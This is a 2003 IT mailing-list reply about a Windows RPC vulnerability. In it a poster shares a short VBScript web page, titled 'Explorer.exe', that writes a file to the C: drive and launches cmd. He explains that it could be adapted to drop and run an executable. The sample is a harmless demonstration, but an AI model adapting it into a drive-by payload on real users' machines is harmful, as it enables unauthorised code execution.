RE: New M$ vulnerability patch for Windows

-----Original Message-----
From: midrange-l-bounces@xxxxxxxxxxxx
[mailto:midrange-l-bounces@xxxxxxxxxxxx]On Behalf Of Jim Franz
Sent: Thursday, September 11, 2003 8:58 AM
To: Midrange Systems Technical Discussion
Subject: Re: New M$ vulnerability patch for Windows


>> I have a theory that if you religously apply the updates and dont open
>> attachments, then you cant be hacked and dont need a firewall. I hope
>> someone else can prove if that is wrong or not.

>That is wrong....email is only one of the methods of delivery, so not
>opening
>attachments shuts only one door. Yesterday's announcement by MS, indicated
>they missed fixing the same general area (RPC) that Blaster got in, and
>expected attacks to
>start within hours. Not quite like Blaster, where MS claimed it's patch had
>been
>out for months.

Hi Jim,

Here is some vbscript code that can be embedded in a web page that shows how
a file can be created and written to on your pc and also how an .exe file
can be run on your pc.  The crazy thing about it is that the script can be
modified to write the hex value of an .exe file to the users pc and then
that program can be run.

The only protection is that the browser user has to click yes to allow the
vbscript code to run.  To my knowledge, no firewall will protect from a
script being run on the pc.

-Steve

<html>
<title>Explorer.exe</title>
<script language=vbs>

Set fso = CreateObject("Scripting.FileSystemObject")
sPath = "c:\vbs_test.txt"
Set f = fso.CreateTextFile( sPath, ForWriting)
f.WriteLine( "Line 1" )
f.WriteLine( "Line 2" )
f.Close

Set shell=CreateObject("WScript.Shell")
shell.run( "cmd" )
</script></html>